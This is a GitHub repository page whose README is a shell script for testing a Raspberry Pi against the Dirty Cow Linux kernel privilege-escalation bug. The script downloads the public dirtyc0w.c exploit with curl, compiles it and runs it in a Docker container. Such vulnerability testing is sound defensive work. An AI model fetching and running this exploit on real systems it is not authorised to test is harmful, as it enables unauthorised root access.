Skip to content

Testing Raspberry Pi against the Dirty Cow vulnerability with Docker magic

License

Notifications You must be signed in to change notification settings

DieterReuter/rpi-dirtycow

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

2 Commits
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

#!/bin/sh

# infos from:
#   https://www.redpacketsecurity.com/testing-dirty-cow-cve-2016-5195/
# run with:
#   $ bash README.txt

set -e 

sudo apt-get install -y gcc
curl https://raw.githubusercontent.com/dirtycow/dirtycow.github.io/master/dirtyc0w.c > dirtyc0w.c
gcc -static -s -pthread dirtyc0w.c -o dirtyc0w

docker build -t rpi-dirtycow .
docker run --rm -ti rpi-dirtycow

About

Testing Raspberry Pi against the Dirty Cow vulnerability with Docker magic

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published